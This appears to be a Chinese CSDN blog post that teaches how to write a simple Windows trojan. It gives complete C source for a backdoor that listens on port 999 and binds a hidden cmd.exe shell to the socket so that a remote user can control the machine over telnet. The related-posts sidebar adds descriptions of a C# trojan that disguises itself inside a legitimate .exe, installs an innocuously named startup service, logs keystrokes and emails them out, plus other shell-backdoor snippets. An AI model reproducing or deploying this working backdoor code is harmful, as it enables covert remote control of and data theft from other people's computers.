简单木马的编写

最新推荐文章于 2024-01-27 09:39:33 发布
最新推荐文章于 2024-01-27 09:39:33 发布
阅读量2k 收藏 8
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44540487/article/details/107901679
版权

MINI木马的编写
编写一个服务端,服务端开启远程后门
客户端使用telnet命令来操控该木马

先进行服务段的编写

WSADATA  wsaData;
SOCKET   ServiceSocket,ClientSocket;
SOCKADDR_IN  SockAddr;
int SockAddrSize;
WSAStartup(MAKEWORD(2, 2), &wsaData);

SockAddr.sin_family = AF_INET;
SockAddr.sin_addr.S_un.S_addr = INADDR_ANY;
SockAddr.sin_port = htons(MasterPort);

ServiceSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,0,0);
bind(ServiceSocket, (SOCKADDR*)&SockAddr, sizeof(SockAddr));
listen(ServiceSocket, 1);
SockAddrSize = sizeof(SockAddr);
ClientSocket = accept(ServiceSocket, (SOCKADDR*)&SockAddr, &SockAddrSize);

先来编写网络通信,使用的是流套接字,也就是TCP网络编程
定义相关变量,初始化widows套接字,然后定义SOCKADDR_IN的相关变量,创建服务端的套接字,将套接字与IP进行绑定,然后进行监听等待客户端进行同意。

接下来就是创建一个进程,用来从目的机中获取我们需要的信息

//创建一个进程
	PROCESS_INFORMATION ProcessInfo;  //进程信息
	STARTUPINFO      StartupInfo;     //启动信息
	char     szCMDPath[255];


	ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
	ZeroMemory(&StartupInfo, sizeof(StartupInfo));

	//从环境变量中获取路径
	GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));
StartupInfo.cb = sizeof(STARTUPINFO);
	StartupInfo.wShowWindow =SW_HIDE;
	StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
	StartupInfo.hStdInput = (HANDLE)ClientSocket;//将命令窗口与套接字连接起来,将套接字作为命令窗口的标准输入
	StartupInfo.hStdOutput = (HANDLE)ClientSocket;
	StartupInfo.hStdError = (HANDLE)ClientSocket;

	//创建一个新的进程
	CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE,0, NULL, NULL, &StartupInfo, &ProcessInfo);

	WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
	CloseHandle(ProcessInfo.hProcess);
	CloseHandle(ProcessInfo.hThread);

先是进行变量的定义,将相关变量清零,获取一条路径,就是存在cmd.exe可执行程序的路径,定义启动信息中的内容,可以参考下面这条博客,了解STARTUPINFO结构体中的内容
https://blog.csdn.net/whynottrythis/article/details/39828395
然后创建新的进程,WaitForSingleObject是等待上面的进程结束以后继续运行上面的进程,关闭进程,关闭线程。

#pragma comment(lib,"ws2_32.lib")
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include<stdio.h>
#include<stdlib.h>
//#include<Windows.h>
#include<WinSock2.h>

#define MasterPort  999

void main()
{
	WSADATA  wsaData;
	SOCKET   ServiceSocket,ClientSocket;
	SOCKADDR_IN  SockAddr;

	int SockAddrSize;
    
	//创建一个进程
	PROCESS_INFORMATION ProcessInfo;  //进程信息
	STARTUPINFO      StartupInfo;     //启动信息
	char     szCMDPath[255];


	ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
	ZeroMemory(&StartupInfo, sizeof(StartupInfo));

	//从环境变量中获取路径
	GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));

	//printf("%s\n", szCMDPath);

	WSAStartup(MAKEWORD(2, 2), &wsaData);

	SockAddr.sin_family = AF_INET;
	SockAddr.sin_addr.S_un.S_addr = INADDR_ANY;
	SockAddr.sin_port = htons(MasterPort);

	
	ServiceSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,0,0);
	bind(ServiceSocket, (SOCKADDR*)&SockAddr, sizeof(SockAddr));
	listen(ServiceSocket, 1);
	SockAddrSize = sizeof(SockAddr);
	ClientSocket = accept(ServiceSocket, (SOCKADDR*)&SockAddr, &SockAddrSize);
	
	//	//send(ServiceSocket, "Hello! \n", sizeof("Hello!"), 0);
//	//printf("Send OK! \n");

	StartupInfo.cb = sizeof(STARTUPINFO);
	StartupInfo.wShowWindow =SW_HIDE;
	StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
	StartupInfo.hStdInput = (HANDLE)ClientSocket;//将命令窗口与套接字连接起来,将套接字作为命令窗口的标准输入
	StartupInfo.hStdOutput = (HANDLE)ClientSocket;
	StartupInfo.hStdError = (HANDLE)ClientSocket;

	//创建一个新的进程
	CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE,0, NULL, NULL, &StartupInfo, &ProcessInfo);

	WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
	CloseHandle(ProcessInfo.hProcess);
	CloseHandle(ProcessInfo.hThread);



	closesocket(ServiceSocket);
	closesocket(ClientSocket);
	WSACleanup();


	system("pause");
	//return 0;
}

完整代码,创建完成后可以在虚拟机中进行测试,但是应为本身比较简单,需要自己启动,启动以后就可以在本机中使用telnet+目的机IP+999进行控制了,使用windows命令行来控制,需要自己去了解windows命令行中的命令。

菜鸡本机
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C# 木马功能的简单实现
12-04
1、首先解决开机启动木马。通过建立开机启动服务达到目的; 2、伪装问题。通过c#反射性能,将正常的.net的exe文件添加监控盗传播取等其他功能,执行正常程序同时,后台悄悄释放windows服务,通过服务释放调取木马exe; 3、传播问题。可以包装一个.net做的,使用比较广的软件,因为通过反射可在exe内执行其他功能,至于执行什么功能想到了就可以做 4、在执行本例子前,先随意编写一个.Net的exe文件,在“被包装exe文件名”指向该文件,其中“监控执行检测间隔(秒):”设置大一些,因为监控程序随着服务开机启动,需windows启动成功后方可正常运行。“建立的服务名”、“服务文件路径和名称”、“监控文件路径和名称”为防止用户删除,放置在windows里面的一些文件夹内部,名字起得系统一些,比如“UpdataServer”等等,就是使用户不知道他是干嘛的,不会删除的那种。本例子生成的exe文件,除了执行你编写的.Net的exe文件外,监控你设定的多个进程,记录键盘,并按照你设定的时间定时发送键盘记录到你设定的邮箱。程序里执行的监控代码和安装服务代码为字符串形式,根据你填写的条件,并自动编译为临时文件,并生成包装后的C#代码,自动编译后输出exe文件。执行该exe文件,看到的为你编写的.Net的exe文件效果,后台建立了开机启动的一个服务,并释放了一个监控exe文件,通过服务执行,并每次开机就执行服务来开启监控。 5、如需对监控进行加固,变为用户不可删除,可以修改代码字符串,加入建立多个windows服务,并在监控程序内检测windows服务是否存在,并释放执行windows服务,在服务字符串代码内释放多个exe监控,形成多服务、多exe的相互检测、相互释放,这样用户除非重做系统,否则不能删除该监控,这个加固功能就不提供代码了。 这里提供代码的只是建立单一服务、单一监控的,可以删除掉的代码。 这里只是监控键盘发送邮件,想干别的,自行修改功能代码
命令行正向连接木马雏形
井底之蛙
06-23 1388
/**//*    1k(程序体积1kb)正向连接,零管道后门 By DNA32r说明:    标准的命令行正向连接木马雏形,仅供学习..    这里只是简单的演示一下..没有添加进程隐藏功能    程序可以在Win9x,Win2k,WinXP,Win2k3上使用    程序体积只有1k(FSG压缩一下会更小)测试:    本地开启NetCat等工具,连接远程计算机80端口,会得到一个Shel
1K后门代码
04-26 1599
 /*  1k(程序体积1kb) 反向连接,零管道后门测试:  本地开启nc -l -p 8000,监听8000端口,会得到一个Shell*/#pragma comment(linker,"/subsystem:windows /FILEALIGN:0x200 /ENTRY:Entrypoint")#pragma comment(linker,"/INCREMENTAL:NO /IGNORE:40
cmd shell 重定向到网络
vingo888的专栏
08-17 655
#include "Winsock2.h"#pragma comment(lib,"ws2_32")#define MasterPort 80 void Entrypoint(){    WSADATA WSADa;    sockaddr_in SockAddrIn;    SOCKET CSocket,SSocket;    int iAddrSize;    PROCESS_INFORMAT
用c++写一个远程控制木马(转)
2301_78273259的博客
07-06 1548
1)UINT GetSystemDirectory()函数这个函数的参数 lpBuffer会返回系统路径,我们提取前面两位就是就可以得到系统分区,例如“C:”2)DWORD GetModuleFileName()函数这个函数是返回我们程序自身的完整路径。
木马程序的制作
热门推荐
自学编程_youkewang.top
03-08 3万+
0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你的系统,窃取你的隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马的制作. 实验环境:一台Win7SP1和一台WinXPsp3+Backtrack5. 使用工具有:msfpayload+msfencode.   0x01:使用msfpayload windows/mete
手把手简单制作一个 Java 木马程序
xmt1139057136的专栏
08-01 6794
你知道的越多,不知道的就越多,业余的像一棵小草!你来,我们一起精进!你不来,我和你的竞争对手一起精进!编辑:业余草juejin.cn/post/6990715558178062372推荐:...
Python编写简易木马程序
记录,总结,成长
01-28 9107
Python编写简易木马程序 0x00 准备 文章内容仅供学习研究、切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413
手动编写木马
The code way of kinnisoy
04-29 3万+
使用C++实现一个简单木马,实现木马的远程控制功能,能够开机自启动和伪装或隐藏,最后通过清除本木马,掌握常规的木马排查和查杀方法。 工具:vc++6.0 攻击机:win10(ip随机) 靶机:192.168.1.129 一、木马是什么? 这是一个老生常谈的问题,木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马...
怎么做一个木马
wuli1024的博客
01-27 1721
木马恶意软件,打开时似乎是用户打开的合法文件,例如打开图像或文档或播放媒体文件,但在后台,它会运行一些邪恶的进程,例如有人可能通过后门或注入一些其他有害代码。
易语言基础教程之简单代码的编写
09-02
本文通过一个简单的示例,给大家讲解了如何在易语言软件中编写代码的过程,以及编写代码的原理,非常实用,有需要的小伙伴可以参考下。
VB实现网页木马
07-10
1.剖析网页木马的工作原理 2.理解木马的植入过程 3.学会编写简单的网页木马脚本 4.通过分析监控信息实现手动删除木马
如何编写批处理文件批处理文件批处理文件
04-14
简明批处理教程22009年10月20日 星期二 下午 05:35 最近对于批处理技术的探讨比较热,也有不少好的批处理程序发布,但是如果没有一定的相关知识恐怕不容易看懂和理解这些批处理文件,也就更谈不上自己动手编写了,古...
vb_FSO及木马
03-07
1、 VB的文件系统对象FSO)第一部分 2、 VB的文件系统对象(FSO)第二部分 3、 VB的数据库系统第一部分 4、 VB的数据库系统第二部分 5、 VB的网络编程模式 ...7、 编写一个简单木马 8、 复杂木马编写 9、 病毒的编写
计算机专业Java专业课程实验+CRM客户关系管理系统设计学生课程实验.zip
05-01
学生课程实验:大二计算机专业JAVA专业课的课程实验,设计一个CRM的客户关系管理系统,含项目源码、数据库、以及汇报PPT。 内容目录: ├── readme.txt ├── 基于Java的CRM客户关系管理系统的设计和实现数据库 │ └── crm.sql ├── 基于Java的CRM客户关系管理系统的设计和实现项目源代码 │ └── MyCrm.zip ├── 基于Java的CRM客户关系管理系统的设计和实现项目运行截图 │ ├── 主界面.PNG │ ├── 产品信息管理.PNG │ ├── 客户信息添加.PNG │ ├── 登录.PNG │ └── 角色管理.PNG ├── 视频 │ ├── 1CRM客户关系管理系统_项目的配置以及启动.url │ ├── 2CRM客户关系管理系统_工作桌面_信息中心_邮箱功能_客户管理_订单管理.url │ └── 3CRM客户关系管理系统_财务管理_产品管理_部门管理_岗位管理_数据回收站_权限管.url └── 论文 ├── 基于Java的现代数字化CRM客户关系管理系统答辩ppt.pptx
node-v12.17.0-linux-arm64.tar.xz
最新发布
05-01
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
常见移动变现术语(mobile monetization).docx
05-01
常见移动变现术语(mobile monetization).docx
废物转运站:决策指南 垃圾转运站:决策指南
05-01
废物转运站:决策指南
冰蓄冷的一些资料.zip
05-01
冰蓄冷的一些资料:包括系统的原理图,设计计算等
windows木马病毒
09-27
木马病毒是一种计算机恶意软件,它通常被伪装成有用的程序或文件,以便欺骗用户进行安装或打开。与传统计算机病毒不同,木马病毒不会自我复制,也不会直接破坏计算机系统。它的目的是在用户不知情的情况下,远程控制受感染的计算机,从而进行各种不法活动,例如窃取个人信息、盗取银行账户、攻击其他计算机等。 根据功能的不同,木马病毒可以分为多种类型。其中包括: 1. 信息窃取木马:该类型的木马病毒主要用于窃取用户的个人信息,例如登录凭证、信用卡信息等。 2. 远程控制木马:这种木马病毒允许攻击者远程控制受感染的计算机,进行各种操作,例如监视用户活动、远程执行命令等。 3. 破坏型木马:这类木马病毒旨在破坏受感染计算机上的文件系统,可能会删除重要数据或导致系统崩溃。 4. 程序杀手木马:这种木马病毒专门用于关闭对方计算机上运行的某些程序,以便为其他木马病毒提供进入的机会。 请注意,以上仅是木马病毒的一些常见类型,实际上木马病毒的形式和功能非常多样化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值